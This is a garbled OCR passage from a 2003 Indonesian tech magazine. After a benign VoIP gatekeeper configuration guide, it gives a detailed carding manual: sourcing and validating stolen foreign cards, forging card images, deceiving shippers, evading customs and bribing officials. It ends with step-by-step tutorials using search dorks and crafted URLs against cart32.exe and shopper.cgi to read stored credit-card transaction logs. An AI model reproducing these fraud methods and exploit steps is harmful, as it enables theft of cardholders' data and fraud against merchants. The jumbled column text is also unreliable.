maka bisa diletakan di folder yang sama dengan gnugk.exe
misalnya D:\temp\openh323gk\bin\, misal dengan nama
warnetvoip.ini.
Selanjutnya gatekeeper harus dijalankan secara otomatis
ke dalam bagian StartUp agar setiap kali Windows dija-
lankan gatekeeper akan langsung beroperasi. Pada Windows
98, dapat dilakukan melalui:
Start → Settings → Task bar dan Start Menu .. → Start
Menu Programs → Add ..
Isikan pada command line perintah berikut (mohon dise-
suaikan dengan path dari perintah sebetulnya):
D:\temp\openh323gk\bin\gnugk -c d:\temp\openh323gk\bin\warnetvoip.ini
Masukkan program yang anda buat ke Start Menu supa-
ya pada saat kita login ke Windows, program tersebut
dijalankan oleh Windows. Hanya masalahnya dengan
Start Menu program baru akan jalan sesudah kita login
ke Windows, mungkin ada baiknya di coba untuk di
masukan ke autoexec.bat supaya setiap kali mesin di start
gatekeeper langsung di operasikan.
Tentunya sebelum anda memasukan perintah tersebut ke
Start Menu Programs ada baiknya di check dulu di MSDOS
prompt apakah sudah berhasil dengan baik atau belum.
Pada saat proses debugging sebaiknya menjalankan gnugk
dari MSDOS prompt langsung di D:\temp\openh323gk\bin\
dengan mengaktifkan trace sbb:
gnugk -ttt -c warnetvoip.ini
Kita bisa melihat trace message untuk proses debugging
kerja dari gatekeeper.
Bagi anda pengguna Linux, langkah instalasi di Linux sedi-
kit lebih rumit daripada di Windows. Saya menggunakan
Linux Mandrake yang mudah dioperasikan, saya tidak
dapat memberikan komentar terlalu banyak untuk peng-
guna Linux selain Mandrake karena belum mencoba di
distro lain. Adapun caranya adalah sbb:
1. masuk sebagai root
2. copykan gk-2.0a-linux-bin.tgz ke /usr/local/src
3. pindah ke /usr/local/src
4. tar zxvf gk-2.0a-linux-bin.tgz
5. cd openh323gk
6. cd bin
7. cp gnugk /usr/bin
8. cp lib* /usr/lib
9. atau cp lib* /lib
10. contoh file konfigurasi adalah di folder
/usr/local/src/openh323gk/etc.
Anda yang menggunakan Linux Mandrake 9.0 dapat meng-
gunakan openh323 gatekeeper versi 2.0.2 tanpa masalah
berarti. Agak berbeda dengan versi 2.0a, pada versi 2.0.2
tidak ada file lib*, anda cukup menginstal openh323 di Li-
nux Mandrake 9.0 untuk menggantikan lib* yang dibu-
tuhkan. Sisa proses instalasi tidak berbeda dengan versi 2.0a.
Pada titik ini anda bisa menjalankan gnugk dengan cara
mengetikan
gnugk -h
untuk melihat semua perintah command line yang didukung.
Bagian yang akan membuat kepala pusing adalah menset
parameter dari file konfigurasi yang akan saya terangkan
dibawah. Jika telah selesai menset konfigurasi file-nya
maka bisa diletakan di /etc, misalnya dengan nama
warnetvoip.ini. Selanjutnya gatekeeper dapat dijalankan
 NeoTekno

secara otomatis dengan memasukkan line di bawah ini Name=Proxy_Warnet_Anda

pada line terakhir di /etc/rc.d/rc.local sebagai TimeToLive=600
[RoutedMode]
/usr/bin/gnugk -c /etc/warnetvoip.ini & GKRouted=1
pada saat proses debugging ada baiknya menjalankan gnugk H245Routed=0
dari console dengan mengaktifkan trace sbb: CallSignalPort=1721
CallSignalHandlerNumber=2
/usr/bin/gnugk -ttt -c /etc/warnetvoip.ini RemoveH245AddressOnTunneling=1
DropCallsByReleaseComplete=1
perhatikan bahwa tanda & tidak digunakan agar tidak SupportNATedEndpoints=1
dijalankan di background dan kita bisa melihat trace Q931PortRange=30000-39999
message untuk proses debugging kerja dari gatekeeper. H245PortRange=40000-49999
Pada saat gatekeeper di operasikan, seorang operator da- [Proxy]
pat dengan mudah memonitor operasi sebuah gatekeeper Enable=1
InternalNetwork=192.168.0.0/24
dengan cara masuk ke mesin gatekeeper menggunakan T120PortRange=50000-59999
telnet pada status port 7000, tentunya juga diizinkan. Me- RTPPortRange=50000-59999
lalui status port tersebut, seorang operator dapat melihat
[Endpoint]
aktivitas gatekeeper misalnya siapa saja yang sedang re- Gatekeeper=111.222.333.444
gistrasi ke gatekeeper yang kita operasikan, hubungan Type=Gateway
komunikasi/telepon mana yang sedang dilangsungkan dsb. H323ID=Proxy_Warnet_Anda
E164=01112511234599
Operator proxy server, seperti Warnet, kantor dll. Prefix=011125112345
Jika anda operator dari proxy server di Warnet atau TimeToLive=900
RRQRetryInterval=10
kantor, maka bagian ini untuk anda. ARQTimeout=2
Agar sebuah gatekeeper dapat di operasikan sebagai proxy [RasSvr::RewriteE164]
VoIP berdampingan dengan program proxy lainnya, se- 62111=0111
perti squid (di Linux) atau Wingate / Winroute (di Win- [GkStatus::Auth]
dows), anda perlu melihat file /usr/local/src/openh323gk rule=allow
/etc/proxy.ini dan child.ini sebagai referensi untuk
membuat file konfigurasi warnetvoip.ini. Operator gatekeeper di Internet
Dari contoh konfigurasi proxy.ini anda perlu mencuri Secara umum proses instalasi gatekeeper di Internet tidak
terutama section [Proxy] dan setting secara benar, berbeda dengan proses instalasi gatekeeper di proxy server
di Warnet/kantor. Yang berbeda sangat jauh adalah isi
InternetNetwork= konfigurasi file-nya. Bagi anda yang penasaran silakan
Dari child.ini anda perlu mencuri terutama section dilihat secara detail di bagian operator proxy server di atas.
[Endpoint] & setting secara benar, Peralatan yang dibutuhkan untuk sebuah gatekeeper tidak
Gatekeeper= (ini gatekeeper di ISP atau di IIX) terlalu besar, tentunya sangat bergantung pada jumlah
E164= endpoint dan call/detik yang harus di-handle. Untuk
Prefix= meng-handle sekitar 200-an endpoint dan 3-5 call/detik
Dimana sesuai dengan usulan di atas maka contoh mungkin sebuah PC
E164 = 0111 251 12345 00 Kelas Pentium II
Prefix = 0111 251 12345 64Mbyte RAM
2 Gbyte disk
Untuk nomor di daerah Bogor (251) yang 5 digital awal
nomor telkom-nya adalah 12345. cukup untuk di terjunkan sebagai gatekeeper, tentunya
PC dengan spesifikasi di atas itu dapat meng-handle
Untuk memudahkan hidup anda, saya sertakan di bawah kapasitas yang lebih besar lagi.
contoh warnetvoip.ini sebagai referensi. Mohon diperha-
tikan bahwa gatekeeper pada proxy server di warnet atau Beberapa contoh file .ini pada /usr/local/src/openh323gk/etc
di kantor akan meregistrasikan dirinya ke gatekeeper yang perlu diperhatikan oleh operator gatekeeper agar
yang berada di ISP atau di IIX sebagai gateway, bukan dapat beroperasi secara baik adalah minimal sekali file sbb:
sebagai gatekeeper untuk memudahkan integrasi ke gnugk.ini
jaringan. neighbor.ini
Perhatikan saya menggunakan huruf tebal pada bagian- tentunya bagi anda yang berpikiran maju silakan melihat
bagian yang perlu anda sesuaikan dengan parameter/ file-file yang lain. Untuk mempersingkat diskusi, saya
kondisi jaringan anda. sertakan sebuah contoh file gatekeeper.ini yang disiapkan
## untuk sebuah gatekeeper yang masuk ke dalam jaringan
## This example shows how to use the gatekeeper as an H.323 proxy. gatekeeper. Beberapa parameter yang diberi garis bawah
## harus diganti, d sesuaikan dengan kondisi jaringan yang ada.
## Suppose the host of the gatekeeper has two network interfaces:
## Perhatikan entry,
## WAN : Menggunakan WLAN
## LAN : IP=192.168.0.1 Network=192.168.0.0/24 [RasSvr::Neighbors]
## GatekeeperIDAnda=202.111.222.161:1719;011102212345
## A proxy gatekeeper is usually register with a parent gatekeeper as a
## gateway. See child.ini for the configuration. Harus di-share dengan gatekeeper lain yang beroperasi di
## jaringan agar saling mengenal dan dapat beroperasi seba-
[Gatekeeper::Main] gai jaringan gatekeeper dan melakukan registrasi nomor
Fourtytwo=42 satu sama lain. Perhatikan prefiks yang digunakan harus

Februari 2003 NeoTek 17

 NeoTekno

benar agar jaringan dapat beroperasi dengan baik. Mohon biasa; hanya dapat dihubungkan ke PABX/PBX maupun
para operator gatekeeper untuk dapat berkoodinasi dengan langsung ke saluran telkom melalui konektor RJ-11.
saya di Internet melalui onno@indo.net.id untuk mengkoor- Ada beberapa vendor yang memproduksi peralatan gate-
dinasikan proses sharing informasi antar gatekeeper ini. way VoIP ini, salah satu yang kebetulan saya familiar ada-
Untuk mengantisipasi sambungan Internasional dari jaring- lah dari Planet (www.planet.com.tw) yang di distribusikan
an VoIP Merdeka ke jaringan telepon internasional, ada oleh Corexindo di Mangga Dua.
baiknya semua gatekeeper di jaringan VoIP Merdeka me- Operasi gateway VoIP tidak terlalu sulit karena setting
rewrite nomor prefiks 62111 menjadi 0111 dalam parameternya dapat dilakukan melalui Web maupun tel-
perintah net dengan menggunakan text mode. Logika berfikirnya
[RasSvr::RewriteE164] tidak berbeda jauh dengan setting gatekeeper di atas.
62111=0111 Sebagai contoh untuk Internet Telephony Gateway (ITG)
dari Planet menggunakan text mode dapat diset agar:
# Entry agar dapat menjadi bagian jaringan Gatekeeper VoIP Merdeka
# set h323 gk_mode manual
# Anda harus mengganti GatekeeperID dengan ID yang anda inginkan set h323 gk_addr 202.111.222.123
# misalnya APJIIGK, KantorGK, RTRWNetGK, GK1, GK2, dll … set h323 endpoint_prefix 011125212345
# dua entry di bawah harus di share dengan rekan lain di
# jaringan gatekeeper set h323 term_id ITG_percobaan
# set h323 gk_id GatekeeperIDAnda
# [RasSvr::Neighbors]
# GatekeeperID=202.111.222.161:1719;011102212345 Tentunya parameter H323 di atas hanya khayalan, anda
# harus menyesuaikan dengan kondisi sebenarnya dari
# [EndPoint] jaringan VoIP yang ada.
# Prefix=011102212345
#
[Gatekeeper::Main]
Fourtytwo=42
Name=GatekeeperGK
# Prefix=011102212345
TimeToLive=600
[RoutedMode]
GKRouted=1
H245Routed=0
CallSignalPort=1721
CallSignalHandlerNumber=2
RemoveH245AddressOnTunneling=1
DropCallsByReleaseComplete=1
SupportNATedEndpoints=1
Q931PortRange=30000-39999
H245PortRange=40000-49999
[RasSvr::Neighbors]
APJIIGK=111.222.333.444;*
GK1=202.159.123.162:1719;011122450
GK2=202.123.111.222:1719;011121250
GK3=202.154.222.111:1719;0111251678
GK4=167.205.123.111:1719;* Bagi anda yang agak alergi menggunakan text mode, da-
pat juga menset-nya dengan menggunakan Web. Pada
[EndPoint]
Prefix=011102212345 VoIP gateway Planet fasilitas setting melalui Web juga di
sediakan. Tampak pada gambar adalah bagian setting gate-
[RasSvr::RewriteE164]
62111=0111
keeper di VoIP gateway Planet. Tapi dari pengalaman saya
pribadi, menset menggunakan text jauh lebih memung-
[GkStatus::Auth]
rule=allow
kinkan kita untuk menset berbagai parameter dibanding-
kan melalui Web.
End user yang menggunakan peralatan gateway VoIP Masih banyak lagi fasilitas yang dapat di set dengan
menggunakan sebuah ITG, beberapa parameter di atas
Gateway VoIP adalah peralatan yang dapat menghubung-
cukup untuk meregistrasi ITG anda ke sebuah gatekeeper
kan VoIP di Internet dengan jaringan telepon yang meng-
untuk di kenali nomor-nya. Tentunya di pihak gatekeeper
gunakan sambungan RJ-11. Biasanya peralatan gateway
dapat juga meregistrasikan secara manual sebagai
VoIP ini di sambungkan ke PBX/PABX di kantor atau di
permanent endpoint jika diinginkan.
wartel agar telepon biasa yang ada dapat terkait ke jaring-
an VoIP juga. Teknik yang lumayan membuat pusing kepala adalah
menyambungkan Internet Telephony Gateway (ITG)
Operasi VoIP yang akan sangat menantang dan dapat ber-
melalui port FXO ke peralatan PABX supaya telepon dari
benturan dengan pemerintah terutama jika anda menggu-
Internet, baik dari NetMeeting maupun dari ITG lain
nakan peralatan VoIP gateway dan menyambungkannya
dapat terhubung ke telepon biasa.
ke jaringan Public Switch Telephone Network (PSTN)
milik Telkom melalui peralatan PABX. (Private Automat- Jika anda cukup jeli teknik ini dapat dikembangkan agar
ed Branch Exchange). Biasanya peralatan VoIP gateway nomor telepon Telkom, seperti 022 2504567, di tempat
memiliki dua jenis port, yaitu: anda dapat dikenali di jaringan VoIP Merdeka dan dapat
ditelepon langsung melalui jaringan VoIP Merdeka tanpa
• FXS—yang digunakan untuk dihubungkan langsung ke
perlu melalui Telkom sama sekali. „
pesawat telepon biasa melalui konektor RJ-11.
• FXO—yang tidak dapat dihubungkan ke pesawat telepon

18 NeoTek Februari 2003

 NeoTekno

E-COMMERCE SECURITY
Modus Operandi Carding
Lahirnya e-commerce melahirkan pula teknik-teknik yang merupakan risiko terhadap bisnis e-commerce. Selain
rawan terhadap pencurian database, situs e-commerce juga rawan terhadap credit card fraud yang lebih
dikenal sebagai carding. Seluk beluk carding bukan teknologi semata-mata, melainkan juga social engineering.

EBAGAI DAMPAK DARI MELUASNYA TEKNOLOGI Inter-

S net, salah satu efeknya adalah terjadinya “kena-
kalan” di Internet. Istilah hacking, phreaking,
cracking dan carding, menjadi populer sejalan dengan
popularitas istilah Web, email, chating. Bagi sebagian
orang sulit untuk membedakan kenakalanan model baru
ini. Secara mudahnya, tiga istilah di depan lebih terkait
dengan perusakan infrastuktur komputer, jaringan,
software dan Internet.
Untuk dikategorikan sebagai kejahatan, ketiganya masih
ambigu karena ada juga pelaku yang bertujuan mulia, se-
bagai uji coba keamanan jaringan misalnya, sehingga
pemberian label kejahatan lebih bergantung pada maksud
dan tujuannya.
Lain halnya dengan carding, yang satu ini merupakan
efek langsung dari ketiganya. Label “kejahatan” layak
diberikan kepada pelaku carding, karena prinsipnya sama
persis dengan maling, pencuri ataupun copet serta korup-
tor. Hanya saja media yang digunakan lebih canggih, dan
belum terjangkau hukum formal serta terjamah aparat
hukum. Berikut paparan pengantar tentang carding.
• “Portal” carder Indonesia (www.geocities.com/yogyacarding/
Latar belakang blackapril.htm) didedikasikan bagi para carder Indonesia. Di sini selain
Manifesto Carder, anda akan menjumpai pula informasi pada menu
Tidak sedikit pelaku carding berawal dari sekedar iseng,
History, Info Online Shop, dan Tips & Tricks Carding. Hati-hati dengan
mencoba peruntungannya. Meski tidak ada statistik resmi
Download sebab ada program yang konon tanpad disadari dapat
tentang hal ini, tetapi sepengamatan penulis merekalah
memformat hard disk anda.
yang paling banyak. Rata-rata frekuensi browsing mereka
di Internet masih minim, dan sekedar mencari tahu saja. balas dendam, registrasi memasuki komunitas tertentu,
Ada anggapan sebagian orang yang mau dianggap jago dan lain sebagainya. Pelaku ini biasanya terpelajar—
Internet bila sudah mampu membobol kartu kredit orang paham komputer, Internet dan jaringan—dan sedikit
yang sudah diamankan sedemikan rupa. Yang satu ini me- jumlahnya.
rupakan pernyataan keblinger dari orang yang mencoba
menjadi hacker—dan biasanya mereka mengaku-ngaku Tujuan
sebagai hacker bukan carder. Sebetulnya ini merupakan 1. Secara konvensional pelaku bertujuan mendapatkan
pernyataan aktualisasi diri di Internet. barang yang diinginkan.
Diakui ataupun tidak, budaya hedon atau mudahnya “bu- 2. Ada pula yang bermaksud mendapatkan uang secara
daya kepinginan” akibat provokasi konsumerisme dari langsung. Prisnsip kerjanya kurang lebih sama dengan
iklan (baca: media) membuat sebagian orang mencari ja- yang pertama hanya saja secara spesifik dilakukan:
lan pintas untuk memperoleh barang yang dimau hanya Teknik Refund. Pesanan sengaja dibatalkan, (pembatalan
bermodalkan biaya koneksi warnet. langsung, alamat pengiriman asal sehingga barang
Sebagian dari pengangguran produktif yang tidak tersalur kembali ke pengirim, mengaku alamat pengiriman sedang
mencoba peruntungan dan menyalurkan keahliannya di kosong karena sedang ada di luar negeri, dan lain
bidang ini. Sepengamatan penulis, ada banyak sarjana sebagainya) sehingga dana yang sudah diambil merchant
yang masih menganggur memanfaatkan lahan basah ini dapat diminta kembali untuk dikirim lewat check, pay
sebagai mata pencarian. Bila dipakai tolok ukur dengan pall, atau moneygram dan rekening bank.
sejumlah pegawai dotkom dan dotnet yang dirumahkan Penjualan secara online atau lewat lelang tertutup di
tempo hari, agaknya hal ini cukup signifikan dengan komunitas tertentu.
kesempatan kerja dibidang IT langka dengan tenaga ahli.
3. Tidak sedikit orang Indonesia yang ingin memiliki fasi-
Ada juga pelaku yang memiliki tujuan tertentu, misal

Februari 2003 NeoTek 19

 NeoTekno
litas mewah yang disediakan di Internet, untuk itu kartu
kredit curian digunakan untuk mendapatkan account
khusus pada situs judi, porno. Privelege untuk dapat me-
masuki koneksi sebuah server dan simulator. Tidak tertu-
tup juga nomor kartu kredit tersebut digunakan untuk
membeli lisensi software atau UNIX Shell. Sementara itu
bisnis penjualan domain dan pemanfaatan hosting yang
membutuhkan pembayaran kartu kredit, menjadi lahan
yang menjanjikan untuk meraup rezeki, meski ada juga
yang digunakan untuk kepentingan domain sendiri.
Cara kerja
Sendiri, tipe single figthter biasanya merupakan pemula
atau mereka yang memang sudah ahli sehingga tidak
memerlukan bantuan.
Berkelompok, kumpulan carder yang bekerja sama dalam
satu komunitas tertentu. Kelompok ini bisa secara fisik
berdekatan bisa pula secara virtual, secara fisik berjauhan.
Kelebihan mereka yang berkumpul adalah selalu terse-
dianya informasi nomor kartu kredit baru, situs baru,
teknik-teknik pengamanan, dan lain sebagainya. Di sini
dimungkinkan adanya pembagian tugas, semisal pencari
kartu kredit baru, situs baru, pengorder barang, negosia-
tor, penjual, bahkan translator bagi yang tidak paham
bahasa tertentu. Kelompok ini sangat solid, bahkan sam-
pai pada pembagian hasil, bila ada yang nyeleweng tak
segan mereka secara kejam “menyiksa” si pelaku, baik
secara fisik maupun mental.
Metode Pencarian
Lokasi akses yang paling strategis adalah warnet, dengan
alasan klasik sulit dilacak. Ada pula pertimbangan lain,
misal pemilik dan operator mau diajak kerja sama—syu-
kur kalau mau tempatnya dijadikan alamat tujuan pengi-
riman—pengamanan komputer dan bandwidth warnet
yang tidak ketat.
Kartu kredit yang memenuhi kriteria
• Milik orang asing. Haram dan bodoh hukumnya mema-
kai kartu kredit dari Indonesia, kecuali kalau mau untuk
ditukarkan dengan nomor asing.
• Masa berlaku masih lama agar dana yang tersedia ma-
sih banyak dan tidak mendekati limit
• Bank yang mengeluarkan minimal pernah didengar na-
manya karena ada juga merchant yang tidak mau mene-
rima kartu dari bank tertentu.
• Prioritas untuk mendapatkan kartu VISA, baru Master-
card, Amex, Diner dan lain sebagainya.
Ada beberapa cara yang dilakukan untuk memperoleh
kartu kredit
• Mendapat setoran nomor kartu kredit [fresh !] dari
orang yang bekerja di hotel, cafe, restoran, travel agent
dan tempat yang banyak dikunjungi orang asing.
• Bertukar di room chat IRC
• Menjebol situs belanja dengan dengan skrip tertentu,
berkolusi dengan webmaster yang sakit hati, atau mencari
kelemahanannya yang lain.
Target barang yang dibelanjakan
Biasanya barang-barang tersebut tidak ada di Indonesia,
atau sulit didapat, mahal, perlengkapan khusus (otomotif,
olah raga, hobbies, buku, software, kebutuhan medis). Ada
sebagian kecil yang iseng memesan coklat, boneka Tele-
20 NeoTek Februari 2003
tubies, kondom, viagra, alat bantu sex, majalah porno.
Pertimbangan khusus untuk memilih barang adalah:
• Mudah dikeluarkan oleh pabean, secara fisik tidak
mencolok dan mencurigakan.
• Pajak tidak tinggi, terkait dengan pembayaran yang nan-
tinya dibayarkan oleh pemesan. Untuk itu perlu penge-
tahuan tentang perpajakan dan biasanya hal ini diterang-
kan oleh pihak shipment atau bea cukai.
• Target situs belanja. Alat bantu pertama yang diguna-
kan adalah search engine, bisa Google, Altavista, Buyer
Index dan lainnya. Cukup ketikkan kata kunci jenis ba-
rang yang diinginkan, maka akan keluar ratusan bahkan
ribuan situs. Tinggal dipilah-pilah mana yang cocok dan
yang tidak.
Otentifikasi
Kartu kredit. Kartu kredit yang diperoleh meskipun fresh
belum tentu siap pakai. Untuk itu carder profesional perlu
melakukan otentifkasi bertingkat dengan cara:
1. Melakukan generate pada software generator, dan akan
ditemukan informasi
• Card issue -bank yang mengeluarkan
• Area alamat pemegang kartu kredit yang diidentifikasi
dengan kombinasi nomor kartu kredit yang mengarah
pada kode pos. Dari sini bisa dibuat nama, alamat, nomor
telepon pemilik kartu secara fiktif oleh software.
• Nomor kartu kredit lain yang se card issue, yang bisa
dijadikan alternatif bila nomor kartu ini ditolak.
2. Validasi kartu kredit, biasanya secara online pada situs
porno, judi, underground. Yang lebih profesional me-
manfaatkan situs pengembangan software security yang
membutuhkan donasi, kalau yang satu ini validasinya
bisa 100%, cukup sumbang $2 saja.
Situs target. Faktor penentu keberhasilan belanja dimulai
disini, beberapa pertimbangan carder untuk memilih situs
belanja yang nyaman adalah:
• Mau mengirim ke luar negeri, terutama Asia, syukur
ada option Indonesia.
• Pembayaran online yang realtime, dengan otentifikasi
seadanya tanpa perlu mengirim balik foto copy kartu
kredit yang dipergunakan.
• Bukan merupakan afiliasi dari usaha serupa di
Indonesia.
• Pilihan metode shipment (pengiriman) yang banyak,
dan tidak terikat.
Mengatasi pengamanan ekstra dan metode
pembayaran lain
Mengakali alamat
Bukan rahasia lagi kalau tujuan pengiriman Indonesia
kini sulit dilakukan. Biasanya pemesanan menuliskan
tujuannya negara lain tapi dengan tetap mempergunakan
kode pos Indonesia. Metode ini manjur karena shipment
melakukan verifikasi dengan melalui kode pos yang
sudah pasti keunikan nomornya, apalagi bila database
alamat kota dan jalannya terdapat di kode pos tersebut.
Ada beberapa metode pengamanan ekstra pada situs ter-
tentu. Di antaranya adalah keharusan untuk mengirim-
kan foto copy kartu kredit bolak balik beserta tanda ta-
ngan dan social security number (KTPnya orang Ame-
 NeoTekno

rika). Para carder yang sudah kebelet biasanya melakukan • Ambil di kantor shipment agent, cara paling nekat
olah image lewat sofware pengolah image (macam Photo- adalah menjemput bola. Resiko tertangkap sangat besar
shop). Tinggal capture atau scan kartu kredit asli lalu bila tidak memiliki "orang dalam".
kotak-katik, print, image siap untuk dikirim melaui fax
atau emai, bergantung permintaan. Penjualan
Metode pembayaran lainnya adalah dengan penggunaan Antar teman offline. Umum dilakukan untuk menutup
e-wallet, paypall, check, moneygram. Biasanya carder pe- terjadinya penipuan, atau malah paling apes jebakan yang
mula malas melakukan metode pembayaran ini, karena berakhir penangkapan dari aparat.
ruwet dan berbelit. Tapi bila ini berhasil, transaksinya bisa Antar teman online. Biasanya shipment dibelokkan lang-
mencapai puluhan ribu dolar. Caranya dengan mendaftar sung oleh pemesan ke yang bersangkutan. Kompensasi
pada situs yang menyediakan layanan tersebut, setelah bisa uang, barang lain, atau jasa (mis; pembuatan situs,
sebelumnya menyediakan sejumlah nomor kartu kredit account, image kartu kredit palsu, “pelacuran,” dan lain
yang valid 100%, nomor social security, rekening bank. sebagainya) bergantung lokasi teman online.
Teknik order Masuk counter barang yang spesifik, misal sebuah laptop
dijual ke main dealer dengan harga non garansi.
Web based, merupakan hal umum yang dilakukan dan
tidak terlalu sulit. Akibat pada bangsa
E-Mail order, dimanfaatkan bagi situs yang tidak menye- Kenakalan internet yang mengarah pada kriminal ini
diakan transaksi web -web hanya sebagai galeri, atau membuahkan hasil, yang tidak terpikirkan akibatnya
tidak memberi pilihan untuk pengiriman keluar negeri, ke oleh para pelaku, yaitu;
Asia, apalagi Indonesia. Untuk itu kemampuan berbahasa
• IP address Indonesia diblokir untuk transaksi dan
asing terutama Inggris amat diperlukan disini, apalagi bila
memasuki situs tertentu.
terpaksa harus bernegosiasi untuk meyakinkan merchant.
• Kartu kredit dari Indonesia diblokir.
Fax order, secara prisip hampir sama dengan mail order, • Integritas pebisnis Indonesia turun.
hanya saja biasanya merchant tidak menerima internet
Secara langsung saat ini mungkin pelaku tidak merasakan
fax, untuk melacak alamat nomor tujuan. Untuk meng-
dampaknya. Namun pada masa mendatang bangsa yang
atasi ini, carder bekerja sama dengan pihak wartel. Jenis
sudah terpuruk ini semakin terpuruk lagi akibat ulah
belanjaan pada metode ini umumnya grosir, dan transaksi
segelintir oknum pengguna Internet. Apa jadinya jika
yang terjadi juga besar, bisa mencapai puluhan ribu dollar.
Indonesia tidak ada lagi koneksi Internet. Jelas tidak
mungkin kita hanya saling berhubungan internet hanya
Konfirmasi melalui jalur IIX, dan tidak mendapat koneksi global.
Wajib hukumnya untuk melakukan konfirmasi setelah Hanya kesadaran moral saja yang dapat menghentikan-
belanja, bahkan pada saat belanja betulan. Hal ini berguna nya, karena lemahnya perangkat dan aparat hukum.
untuk memberikan instruksi
Removal tag. Mencopot semua label yang terkait dengan
harga agar pihak bea cukai kesulitan memberikan
estimasi pajak yang berdasarkan harga barang, sehingga
biaya pajak bisa dinegosiasikan atau syukur malah kalau
ditiadakan. Bisa juga barang tersebut diakui sebagai
barang bekas, hadiah, pengiriman kembali karena
komplain.
Pengepakan. Siasat ini juga untuk mengelabui bea cukai
dan shipment, agar pajak dan asuransinya menjadi lebih
murah. Misalnya adalah mengepak perhiasan dalam
boneka atau membungkusnya bersama buku bekas.
Permintaan track number, dapat untuk mengetahui
• Jalur perjalanan barang. Menariknya di sini sering ter-
jadi saling bajak antar carder. Jadi ada carder lain yang
mengklaim barang tersebut dan memindahkan alamat
pengiriman.
• Oknum yang bisa disuap; bea cukai, pegawai pos,
pegawai shipment, polisi
Penerimaan barang
• Diantar ke alamat pemesan, sama seperti barang
kiriman umumnya, hanya saja biasanya dilakukan secara
sembunyi-sembunyi atau diluar jam kerja karena
penerima takut bila ternyata kurir pengirim dibuntuti
aparat.
• Ambil di tempat tertentu, setelah mengadakan • BlackApril “mengungkapkan” identitasnya sebagai carder lewat situs
perjanjian sebelumnya dengan kurir, ditentukan tempat Web-nya (www.geocities.com/yogyacarding/blackapril.htm). Anda
tertentu yang biasanya ramai atau malahan sulit berniat menjadi carder? Silakan mengikuti kursus kilat melalui situs
diketahui. Yogyacarding ini.

Februari 2003 NeoTek 21

 NeoTekno

E-COMMERCE SECURITY
etelah anda banyak mendengar
S tentang carding, mungkin timbul
pertanyaan, bagaimana cara orang
mendapatkan akses kartu kredit tersebut.

MEMANFAATKAN Artikel ini berusaha menjelaskan salah satu

cara itu, tetapi bukan dimaksudkan untuk
mengajak anda menjadi carder.

KELEMAHAN CART32.EXE Salah satu cara yang dapat digunakan adalah

memanfaatkan kelemahan CART32.EXE
dengan menggunakan unicode bug “error,
expdate, dan lain sebagainya.”
Bagaimana cara “mengintip” nomor kartu kredit yang digunakan Web yang menyediakan layanan belanja
peselancar ketika melakukan transaksi online? MA Rody Candera secara on-line menggunakan cart32.exe
(odyxb@melva.org) mencoba menjelaskan salah satu caranya untuk dapat memproses transaksinya di
internet yang menggunakan kartu kredit.
untuk anda, sebagai pengetahuan bukan untuk dipraktikkan. Dari sana orang mendapat akses kartu kredit
dengan cara masuk ke dalam sistemnya.

Mengungkap field tersembunyi yang berisikan informasi transaksi, termasuk nomor credit card!

MENENTUKAN TARGET HASIL PENCARIAN MENAMBAHKAN EXPDATE

1 Cari target dengan memanfaatkan
search engine dengan keyword
2 Perhatikan hasil pencarian search
CART32.EXE. Alur web address
yang dijadikan target kurang lebih:
www.target.com/cgi-bin/cart32.exe
engine tersebut. Lihat Web ad-
3 Copy address itu, lalu paste di browser
anda pada bagian Address. Di akhir
dress yang berada di bawah (hasil address itu tambahkan expdate
pencarian pada Google, Web Lengkapnya: www.ipxxxxxire.
address berwarna hijau). com/cscr-32/cart32.exe/expdate
Tidak ada spasi pada addressitu.

TRANSAKSI PADA WEB

5 Sampai di sini, cari file (data tran-
JIKA BERHASIL
4 Tidak semua hosting mempunyai
kelemahan yang sama, mungkin te-
lah di-path. Jika anda mendapati
hosting yang telah di-path, cari target
lain. Tetapi jika berhasil, anda akan
melihat tampilan Web seperti
gambar di atas.
saksi disimpan) yang memiliki alur
sebagai berikut:
1. xxx-orders.txt
2. xxx-xxx.log
3. xxx.c32
File tersebut di cari di sub Cart32
Setup Info and Directory.
Untuk melihat transaksi yang ter-
simpan, copy file tersebut ke ba-
gian akhir dari web address tetapi
tulisan exe pada cart32.exe
dihapus. Sehingga lengkapnya:
www.target.com/cgi-bin/cart32/
xxx-xxx.c32.
berdasarkan web address contoh:
www.ipxxxxxire.com/cscr-32/
cart32/xxx-xxx.c32
cart32.exe mempunyai field-field tersembunyi
Jika dijalankan, akan terlihat
yang menyimpan informasi seperti harga, berat,
tampilan transaksi yang pernah
jumlkah, dan identifikasi dalam source code
terjadi pada Web tersebut
HTML-nya. Di sinilah letak kelemahan aplikasi
shopping cart ini.

22 NeoTek Februari 2003

 NeoTekno

elain cart32.exe, shopper.cgi pun

E-COMMERCE SECURITY S mempunyai kelemahan yang dapat

dimanfaatkan carder. Kembali
ditegaskan, artikel ini dimaksudkan sebagai

MEMANFAATKAN pengetahuan, bukan untuk dipraktikkan.

Shopper..cgi adalah program untuk memban-
tu memproses transaksi belanja online de-

KELEMAHAN SHOPPER.CGI ngan kartu kredit sebagai alat pembayaran.

Pada shopper..cgi, kembali digunakan uni-
code bug untuk dapat masuk ke dalam
sistem tempat menyimpan data transaksi.
Unicode bug kembali digunakan untuk mengungkap informasi Teknik dan langka untuk shopper..cgi lebih
tersembunyi pada aplikasi shopping cart. MA Rody Candera pendek dibandingkan cart32.exe. Unicode
(odyxb@melva.org) membahas kelemahan pada shopping cart bug yang digunakan &template=order.log
dan jika berhasil masuk anda akan langsung
lain, yaitu shopper.cgi. melihat catatan transaksi online yang
menggunakan kartu kredit.

Shopper.cgi membukakan jendela bagi anda...

Informasi Lebih lanjut

www.target.com/cgi-
local/shopper.cgi?preadd=action&key=...
www.target.com/cgi-bin/shopper.cgi?preadd=action&key=...
www.target.com/cgibin/shopper.cgi?preadd=action&key=...
ALUR WEB ADDRESS
1 Kembali gunakan search engine
di Yahoo atau Google dengan
2 Perhatikan hasil search engine
keyword: cgi-bin/shopper.cgi
dan alur Web address untuk
target kita adalah seperti gambar
di atas.
HASIL PENCARIAN
yang digunakan. Lihat Web
address di bagian bawah dari
setiap hasil pencarian.
Ingin mendapatkan informasi lebih
lanjut mengenai e-commerce
security? Hubungi langsung para
penulis di situs Neoteker Official
Portal di sini:
http://neotek.portal.dk3.com/
Selain artikel kiriman para neoteket,
portal ini juga menjadi arsip dari
kegiatan tutorial online di channel
#neoteker Dalnet mengenai banyak
hal mengenai teknologi informasi,
khususnya network security.
Artikel mengenai e-commerce secu-
rity, khususnya kelemahan cart32.exe
dan shopper.cgi telah dibahas dalam
channel ini dan dimuat sebagai arsip
dalam portal di atas.

MENEMPATKAN ADDRESS JIKA BERHASIL

